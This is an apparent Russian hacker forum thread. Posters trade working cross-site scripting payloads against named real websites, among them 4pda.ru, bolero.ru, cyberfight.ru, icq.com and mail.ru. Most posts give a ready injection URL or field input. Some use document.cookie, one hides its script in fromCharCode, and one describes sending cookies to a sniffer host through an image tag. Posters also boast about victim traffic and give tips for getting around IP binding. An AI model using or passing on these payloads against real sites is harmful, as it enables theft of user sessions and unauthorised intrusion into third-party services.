Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс. Пример запроса в поле:
Code: http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F Оставляем комментарий такого вида: Code: "><script>alert('xss')</script>
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс. Пример запроса: Пример можно посмотреть здесь: PS. Не должны быть указаны страна и часовой пояс.
http://robotraff.com/userpanel/selltraff.php Уязвимы все поля Результат - http://robotraff.com/userpanel/stats.php?thread=136
http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0&cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29%3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cat=0&x=0&y=0 http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
Активная XSS на infostore.org На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу. ......................................................................... Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:" при добавлении новости пользователем, и в личных сообщениях. В поле "текст:" пишем следующие: Code: <img src="a"onError=javascript:alert('XSS');> Также, еще была найдена пассивная XSS Code: <a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a> ......................................................................... ______________________________________________ *****************************************
Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте
icq.com все прошлые прикрыли, но: опять в блоге, и опять уязвимо поле "Image web address:" "onmouseover="alert('xss')" все символы не фильтруются и кол-во не ограниченно
работает, в ие по крайней мере точно. http://img30.picoodle.com/img/img30/6/10/21/f_1013m_424a366.jpg
cyberfight.ru популярный ресурс - 7000-8000 хостов в день. пример: при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.
Добавлю, что там еще пассивная ХСС c куками. Уж0с Code: http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Search.x=0&Search.y=0
Paradox Security Systems Code: http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E edit: Blogus.ru Code: http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E edit: Moto.ru Code: http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E
Fugitif, и где там активность???? _http://job.properm.ru/ _http://auto.properm.ru/ Заполняем вакансию, резюме, объявление, и в поле ФИО пишем Code: Иванов Иван <script>alert(/ xss /)</script> Заходим на сайт _http://www.virtualflowers.ru/abook.php Добавить адресата - в каментах Code: <script>alert(/ GraBBerZ.com /)</script>
mail.ru в блогах пишем сообщение, там можно использовать разные теги, например имейдж <img src="адрес_снифера"> так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее. зы пользуясь случаем хочу передать привет админам мейла.